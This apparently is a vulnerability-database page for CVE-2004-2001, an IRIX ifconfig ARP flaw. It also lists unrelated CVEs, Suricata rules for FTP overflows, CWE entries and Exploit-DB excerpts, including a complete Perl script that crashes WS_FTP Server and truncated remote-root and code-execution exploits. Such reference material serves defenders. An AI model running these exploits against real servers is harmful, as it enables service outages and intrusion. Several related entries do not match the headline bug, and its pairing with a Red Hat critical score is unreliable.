CVE-2004-2001
published 2004-05-05
CVE-2004-2001: ifconfig "-arp" in SGI IRIX 6.5 through 6.5.22m does not properly disable ARP requests from being sent or received.
Priority P4 · 10 · medium · 4.6 CVSS 2.0
AV:L/AC:L/Au:N/C:P/I:P/A:P
EPSS 0.32% (24.3rd percentile)
Affected
28 ranges · showing 25 (every listed range is vendor sgi, product irix, with no version range or fix data recorded)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sgi | irix | — | — |
CVSS provenance
nvd v2.0 4.6 MEDIUM AV:L/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat 9.3 CRITICAL
GHSA
GHSA-rw56-gxm9-c6gm: ifconfig "-arp" in SGI IRIX 6
ghsa_unreviewed · 2022-05-03
CVE-2004-2001 [MEDIUM] GHSA-rw56-gxm9-c6gm: ifconfig "-arp" in SGI IRIX 6
Red Hat
namazu XSS flaw
vendor_redhat·CVSS 7.5
CVE-2008-1468 [HIGH] namazu XSS flaw
Cross-site scripting (XSS) vulnerability in namazu.cgi in Namazu before 2.0.18 allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input, related to failure to set the charset, a different vector than CVE-2004-1318 and CVE-2001-1350. NOTE: some of these details are obtained from third party information.
Red Hat
CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
vendor_redhat·CVSS 9.3
CVE-2006-1017 [CRITICAL] CVE-2006-1017: The c-client library 2000, 2001, or 2004 for PHP before 4
The c-client library 2000, 2001, or 2004 for PHP before 4.4.4 and 5.x before 5.1.5 do not check the (1) safe_mode or (2) open_basedir functions, and when used in applications that accept user-controlled input for the mailbox argument to the imap_open function, allow remote attackers to obtain access to an IMAP stream data structure and conduct unauthorized IMAP actions.
Statement: We do not consider safe_mode / open_basedir restriction bypass issues being security sensitive. For more details see http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=169857#c1 and http://www.php.net/security-note.php
Suricata
GPL FTP MDTM overflow attempt
suricata·2010-09-23
CVE-2001-1021 GPL FTP MDTM overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP MDTM overflow attempt"; flow:established,to_server; content:"MDTM"; nocase; isdataat:100,relative; pcre:"/^MDTM\s[^\n]{100}/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; reference:nessus,12080; classtype:attempted-admin; sid:2102546; rev:8; metadata:created_at 2010_09_23, cve CVE_2001_1021, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Suricata
GPL FTP invalid MDTM command attempt
suricata·2010-09-23
CVE-2001-1021 GPL FTP invalid MDTM command attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP invalid MDTM command attempt"; flow:established,to_server; content:"MDTM"; fast_pattern; nocase; pcre:"/^MDTM \d+[-+]\D/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; classtype:attempted-admin; sid:2102416; rev:9; metadata:created_at 2010_09_23, cve CVE_2001_1021, signature_severity Unknown, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (3)
exploitdb·2006-10-06
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (3)
---
source: https://www.securityfocus.com/bid/2908/info
eXtremail is a freeware SMTP server available for Linux and AIX.
eXtremail contains a format-string vulnerability in its logging mechanism. Attackers can send SMTP commands argumented with maliciously constructed arguments that will exploit this vulnerability.
eXtremail runs with root privileges. By exploiting this vulnerability, remote attackers can gain superuser access on the underlying host and can crash eXtremail. If the system is not restarted automatically, a denial of SMTP service will result.
UPDATE (April 26, 2004): Reportedly, this vulnerability has been reintroduced into the new version (1.5.9) of eXtremail.
UPDATE (October 26, 2007): Reports indicate that the 'USER' comm
Exploit-DB
Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow
exploitdb·2004-12-24·CVSS 10.0
CVE-2001-0797 [CRITICAL] Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow
---
/*
* $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
* Copyright (c) 2004 Marco Ivaldi
*
* Buffer overflow in login in various System V based operating systems
* allows remote attackers to execute arbitrary commands via a large number
* of arguments through services such as telnet and rlogin (CVE-2001-0797).
*
* Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
*
* This remote root exploit uses the (old) System V based /bin/login
* vulnerability via the rlogin attack vector, returning into the .bss
* section to effectively bypass the non-executable stack protection
* (noexec_user_stack=1 in /etc/system).
*
* Many tha
Exploit-DB
Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow
exploitdb·2004-11-29
CVE-2001-1021 Ipswitch WS_FTP Server 5.03 - 'RNFR' Buffer Overflow
---
```perl
#===== Start WS_FTP_Overflow.pl =====
#
# Usage: WS_FTP_Overflow.pl
# WS_FTP_Overflow.pl 127.0.0.1 hello moto
#
# WS_FTP Server Version 5.03, 2004.10.14
#
# Download:
# http://www.ipswitch.com/
#
######################################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "21",
                                    Proto => "TCP"))
{
    print "Attempting to kill WS_FTP Server service at $ARGV[0]:21...";
    sleep(1);
    print $socket "USER $ARGV[1]\r\n";
    sleep(1);
    print $socket "PASS $ARGV[2]\r\n";
    sleep(1);
    print $socket "PORT 127,0,0,1,18,12\r\n";
    sleep(1);
    print $socket "RNFR " . "A" x 768 . "\r\n";
    close($socket);
}
else
{
    print "Cannot connect to $ARGV[0]:21\n";
}
#====
```
Exploit-DB
Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
exploitdb·2004-10-21
CVE-2004-1626 Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow
---
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Pur
Exploit-DB
Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
exploitdb·2004-10-16
CVE-2004-0574 Microsoft Windows NNTP Service (XPAT) - Denial of Service (MS04-036)
---
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *
host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10
newsgroup = "control.newgroup"
sock = socket(AF_INET, SOCK_STREAM)
sock.con
Exploit-DB
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
exploitdb·2004-10-06
CVE-2004-1561 Icecast 2.0.1 (Win32) - Remote Code Execution (1)
---
/*
by Luigi Auriemma
Shellcode add-on by Delikon
www.Delikon.de
Because of all the forbidden bytes in a http get request
i had to use a very small shellcode, which was blown up
by Msf::Encoder::PexAlphaNum. Great encoder.
C:\>iceexec 127.0.0.1
Icecast nc 127.0.0.1 9999
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Icecast2 Win32>
*/
#include
#include
#include
#ifdef WIN32
#pragma comment(lib, "ws2_32.lib")
#include
#include "winerr.h"
#define close closesocket
#else
#include
#include
#include
#include
#include
#include
#endif
#define VER "0.1"
#define PORT 8000
#define BUFFSZ 2048
#define TIMEOUT 3
#define EXEC "GET / HTTP/1.0\r\n" \
"a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" "a\r\n" \
"a\r\n" "a\r\n" "a
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (2)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (2)
---
// source: https://www.securityfocus.com/bid/2908/info (same advisory text as entry (3) above)
Exploit-DB
eXtremail 1.x/2.1 - Remote Format String (1)
exploitdb·2001-06-21
CVE-2001-1078 eXtremail 1.x/2.1 - Remote Format String (1)
---
// source: https://www.securityfocus.com/bid/2908/info (same advisory text as entry (3) above)
No writeups or analysis indexed.
CWE
Path Equivalence: 'filename/' (Trailing Slash)
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-49 Path Equivalence: 'filename/' (Trailing Slash)
CWE-49: Path Equivalence: 'filename/' (Trailing Slash)
The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Files or Directories, Modify Files or Directories.
Observed Examples:
CVE-2002-0253: Overlaps infoleak
CVE-2001-0446: Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL.
CVE-2004-0334: Bypass Basic Authentication for files using trailing "/"
CVE-2001-0893: Read sensitive files with trailing "/
CWE
Path Equivalence: 'filename ' (Trailing Space)
mitre_cwe·CVSS 5.0
[MEDIUM] CWE-46 Path Equivalence: 'filename ' (Trailing Space)
CWE-46: Path Equivalence: 'filename ' (Trailing Space)
The product accepts path input in the form of trailing space ('filedir ') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Files or Directories, Modify Files or Directories.
Observed Examples:
CVE-2001-0693: Source disclosure via trailing encoded space "%20"
CVE-2001-0778: Source disclosure via trailing encoded space "%20"
CVE-2001-1248: Source disclosure via trailing encoded space "%20"
CVE-2004-0280: Source disclosure via trailing encoded space "%20"
CVE-2004-2213: Source disclosure via trail